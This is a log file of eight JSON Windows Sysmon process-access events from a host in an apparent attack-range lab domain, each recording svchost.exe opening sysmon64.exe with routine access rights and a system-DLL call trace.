{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
